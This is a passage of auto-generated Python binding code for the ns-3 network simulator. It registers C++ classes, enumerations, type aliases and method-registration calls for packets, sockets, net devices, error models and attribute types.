root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', parent=root_module['ns3::Chunk'])
## application.h (module 'network'): ns3::Application [class]
module.add_class('Application', parent=root_module['ns3::Object'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## boolean.h (module 'core'): ns3::BooleanChecker [class]
module.add_class('BooleanChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## boolean.h (module 'core'): ns3::BooleanValue [class]
module.add_class('BooleanValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## channel.h (module 'network'): ns3::Channel [class]
module.add_class('Channel', parent=root_module['ns3::Object'])
## data-rate.h (module 'network'): ns3::DataRateChecker [class]
module.add_class('DataRateChecker', parent=root_module['ns3::AttributeChecker'])
## data-rate.h (module 'network'): ns3::DataRateValue [class]
module.add_class('DataRateValue', parent=root_module['ns3::AttributeValue'])
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue [class]
module.add_class('DropTailQueue', parent=root_module['ns3::Queue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::ErrorModel [class]
module.add_class('ErrorModel', parent=root_module['ns3::Object'])
## ethernet-header.h (module 'network'): ns3::EthernetHeader [class]
module.add_class('EthernetHeader', parent=root_module['ns3::Header'])
## ethernet-trailer.h (module 'network'): ns3::EthernetTrailer [class]
module.add_class('EthernetTrailer', parent=root_module['ns3::Trailer'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::ListErrorModel [class]
module.add_class('ListErrorModel', parent=root_module['ns3::ErrorModel'])
## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class]
module.add_class('Mac48AddressChecker', parent=root_module['ns3::AttributeChecker'])
## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class]
module.add_class('Mac48AddressValue', parent=root_module['ns3::AttributeValue'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'])
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
module.add_class('Node', parent=root_module['ns3::Object'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
module.add_class('OutputStreamWrapper', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## packet-socket.h (module 'network'): ns3::PacketSocket [class]
module.add_class('PacketSocket', parent=root_module['ns3::Socket'])
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory [class]
module.add_class('PacketSocketFactory', parent=root_module['ns3::SocketFactory'])
## packetbb.h (module 'network'): ns3::PbbAddressBlock [class]
module.add_class('PbbAddressBlock', parent=root_module['ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >'])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4 [class]
module.add_class('PbbAddressBlockIpv4', parent=root_module['ns3::PbbAddressBlock'])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6 [class]
module.add_class('PbbAddressBlockIpv6', parent=root_module['ns3::PbbAddressBlock'])
## packetbb.h (module 'network'): ns3::PbbMessage [class]
module.add_class('PbbMessage', parent=root_module['ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >'])
## packetbb.h (module 'network'): ns3::PbbMessageIpv4 [class]
module.add_class('PbbMessageIpv4', parent=root_module['ns3::PbbMessage'])
## packetbb.h (module 'network'): ns3::PbbMessageIpv6 [class]
module.add_class('PbbMessageIpv6', parent=root_module['ns3::PbbMessage'])
## packetbb.h (module 'network'): ns3::PbbPacket [class]
module.add_class('PbbPacket', parent=root_module['ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >'])
## packetbb.h (module 'network'): ns3::PbbTlv [class]
module.add_class('PbbTlv', parent=root_module['ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >'])
## random-variable.h (module 'core'): ns3::RandomVariableChecker [class]
module.add_class('RandomVariableChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## random-variable.h (module 'core'): ns3::RandomVariableValue [class]
module.add_class('RandomVariableValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## error-model.h (module 'network'): ns3::RateErrorModel [class]
module.add_class('RateErrorModel', parent=root_module['ns3::ErrorModel'])
## error-model.h (module 'network'): ns3::RateErrorModel::ErrorUnit [enumeration]
module.add_enum('ErrorUnit', ['ERROR_UNIT_BIT', 'ERROR_UNIT_BYTE', 'ERROR_UNIT_PACKET'], outer_class=root_module['ns3::RateErrorModel'])
## error-model.h (module 'network'): ns3::ReceiveListErrorModel [class]
module.add_class('ReceiveListErrorModel', parent=root_module['ns3::ErrorModel'])
## simple-channel.h (module 'network'): ns3::SimpleChannel [class]
module.add_class('SimpleChannel', parent=root_module['ns3::Channel'])
## simple-net-device.h (module 'network'): ns3::SimpleNetDevice [class]
module.add_class('SimpleNetDevice', parent=root_module['ns3::NetDevice'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', parent=root_module['ns3::AttributeValue'])
## packetbb.h (module 'network'): ns3::PbbAddressTlv [class]
module.add_class('PbbAddressTlv', parent=root_module['ns3::PbbTlv'])
module.add_container('std::list< ns3::Ptr< ns3::Packet > >', 'ns3::Ptr< ns3::Packet >', container_type='list')
module.add_container('std::list< unsigned int >', 'unsigned int', container_type='list')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxEndOkCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxEndOkCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxEndOkCallback&')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >', 'ns3::SequenceNumber16')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >*', 'ns3::SequenceNumber16*')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned short, short >&', 'ns3::SequenceNumber16&')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >', 'ns3::SequenceNumber32')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >*', 'ns3::SequenceNumber32*')
typehandlers.add_type_alias('ns3::SequenceNumber< unsigned int, int >&', 'ns3::SequenceNumber32&')
typehandlers.add_type_alias('ns3::RngSeedManager', 'ns3::SeedManager')
typehandlers.add_type_alias('ns3::RngSeedManager*', 'ns3::SeedManager*')
typehandlers.add_type_alias('ns3::RngSeedManager&', 'ns3::SeedManager&')
module.add_typedef(root_module['ns3::RngSeedManager'], 'SeedManager')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxStartCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxStartCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxStartCallback&')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyTxStartCallback')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyTxStartCallback*')
typehandlers.add_type_alias('ns3::Callback< bool, ns3::Ptr< ns3::Packet >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyTxStartCallback&')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyRxEndErrorCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyRxEndErrorCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyRxEndErrorCallback&')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ns3::GenericPhyTxEndCallback')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >*', 'ns3::GenericPhyTxEndCallback*')
typehandlers.add_type_alias('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >&', 'ns3::GenericPhyTxEndCallback&')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace addressUtils
nested_module = module.add_cpp_namespace('addressUtils')
register_types_ns3_addressUtils(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_addressUtils(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3ApplicationContainer_methods(root_module, root_module['ns3::ApplicationContainer'])
register_Ns3AsciiTraceHelper_methods(root_module, root_module['ns3::AsciiTraceHelper'])
register_Ns3AsciiTraceHelperForDevice_methods(root_module, root_module['ns3::AsciiTraceHelperForDevice'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3ChannelList_methods(root_module, root_module['ns3::ChannelList'])
register_Ns3DataRate_methods(root_module, root_module['ns3::DataRate'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Inet6SocketAddress_methods(root_module, root_module['ns3::Inet6SocketAddress'])
register_Ns3InetSocketAddress_methods(root_module, root_module['ns3::InetSocketAddress'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address'])
register_Ns3Mac64Address_methods(root_module, root_module['ns3::Mac64Address'])
register_Ns3NetDeviceContainer_methods(root_module, root_module['ns3::NetDeviceContainer'])
register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
register_Ns3NodeList_methods(root_module, root_module['ns3::NodeList'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketSocketAddress_methods(root_module, root_module['ns3::PacketSocketAddress'])
register_Ns3PacketSocketHelper_methods(root_module, root_module['ns3::PacketSocketHelper'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3PbbAddressTlvBlock_methods(root_module, root_module['ns3::PbbAddressTlvBlock'])
register_Ns3PbbTlvBlock_methods(root_module, root_module['ns3::PbbTlvBlock'])
register_Ns3PcapFile_methods(root_module, root_module['ns3::PcapFile'])
register_Ns3PcapHelper_methods(root_module, root_module['ns3::PcapHelper'])
register_Ns3PcapHelperForDevice_methods(root_module, root_module['ns3::PcapHelperForDevice'])
register_Ns3RandomVariable_methods(root_module, root_module['ns3::RandomVariable'])
register_Ns3RngSeedManager_methods(root_module, root_module['ns3::RngSeedManager'])
register_Ns3SequenceNumber32_methods(root_module, root_module['ns3::SequenceNumber32'])
register_Ns3SequenceNumber16_methods(root_module, root_module['ns3::SequenceNumber16'])
register_Ns3SequentialVariable_methods(root_module, root_module['ns3::SequentialVariable'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3SystemWallClockMs_methods(root_module, root_module['ns3::SystemWallClockMs'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3TriangularVariable_methods(root_module, root_module['ns3::TriangularVariable'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UniformVariable_methods(root_module, root_module['ns3::UniformVariable'])
register_Ns3WeibullVariable_methods(root_module, root_module['ns3::WeibullVariable'])
register_Ns3ZetaVariable_methods(root_module, root_module['ns3::ZetaVariable'])
register_Ns3ZipfVariable_methods(root_module, root_module['ns3::ZipfVariable'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3ConstantVariable_methods(root_module, root_module['ns3::ConstantVariable'])
register_Ns3DeterministicVariable_methods(root_module, root_module['ns3::DeterministicVariable'])
register_Ns3EmpiricalVariable_methods(root_module, root_module['ns3::EmpiricalVariable'])
register_Ns3ErlangVariable_methods(root_module, root_module['ns3::ErlangVariable'])
register_Ns3ExponentialVariable_methods(root_module, root_module['ns3::ExponentialVariable'])
register_Ns3FlowIdTag_methods(root_module, root_module['ns3::FlowIdTag'])
register_Ns3GammaVariable_methods(root_module, root_module['ns3::GammaVariable'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3IntEmpiricalVariable_methods(root_module, root_module['ns3::IntEmpiricalVariable'])
register_Ns3LlcSnapHeader_methods(root_module, root_module['ns3::LlcSnapHeader'])
register_Ns3LogNormalVariable_methods(root_module, root_module['ns3::LogNormalVariable'])
register_Ns3NormalVariable_methods(root_module, root_module['ns3::NormalVariable'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3PacketBurst_methods(root_module, root_module['ns3::PacketBurst'])
register_Ns3ParetoVariable_methods(root_module, root_module['ns3::ParetoVariable'])
register_Ns3PcapFileWrapper_methods(root_module, root_module['ns3::PcapFileWrapper'])
register_Ns3Queue_methods(root_module, root_module['ns3::Queue'])
register_Ns3RadiotapHeader_methods(root_module, root_module['ns3::RadiotapHeader'])
register_Ns3RedQueue_methods(root_module, root_module['ns3::RedQueue'])
register_Ns3RedQueueStats_methods(root_module, root_module['ns3::RedQueue::Stats'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3PbbAddressBlock_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbAddressBlock__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbAddressBlock, ns3::empty, ns3::DefaultDeleter<ns3::PbbAddressBlock> >'])
register_Ns3SimpleRefCount__Ns3PbbMessage_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbMessage__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbMessage, ns3::empty, ns3::DefaultDeleter<ns3::PbbMessage> >'])
register_Ns3SimpleRefCount__Ns3PbbPacket_Ns3Header_Ns3DefaultDeleter__lt__ns3PbbPacket__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbPacket, ns3::Header, ns3::DefaultDeleter<ns3::PbbPacket> >'])
register_Ns3SimpleRefCount__Ns3PbbTlv_Ns3Empty_Ns3DefaultDeleter__lt__ns3PbbTlv__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::PbbTlv, ns3::empty, ns3::DefaultDeleter<ns3::PbbTlv> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
register_Ns3SocketFactory_methods(root_module, root_module['ns3::SocketFactory'])
register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3Application_methods(root_module, root_module['ns3::Application'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3BooleanChecker_methods(root_module, root_module['ns3::BooleanChecker'])
register_Ns3BooleanValue_methods(root_module, root_module['ns3::BooleanValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
register_Ns3DataRateChecker_methods(root_module, root_module['ns3::DataRateChecker'])
register_Ns3DataRateValue_methods(root_module, root_module['ns3::DataRateValue'])
register_Ns3DropTailQueue_methods(root_module, root_module['ns3::DropTailQueue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3ErrorModel_methods(root_module, root_module['ns3::ErrorModel'])
register_Ns3EthernetHeader_methods(root_module, root_module['ns3::EthernetHeader'])
register_Ns3EthernetTrailer_methods(root_module, root_module['ns3::EthernetTrailer'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3ListErrorModel_methods(root_module, root_module['ns3::ListErrorModel'])
register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker'])
register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3PacketSocket_methods(root_module, root_module['ns3::PacketSocket'])
register_Ns3PacketSocketFactory_methods(root_module, root_module['ns3::PacketSocketFactory'])
register_Ns3PbbAddressBlock_methods(root_module, root_module['ns3::PbbAddressBlock'])
register_Ns3PbbAddressBlockIpv4_methods(root_module, root_module['ns3::PbbAddressBlockIpv4'])
register_Ns3PbbAddressBlockIpv6_methods(root_module, root_module['ns3::PbbAddressBlockIpv6'])
register_Ns3PbbMessage_methods(root_module, root_module['ns3::PbbMessage'])
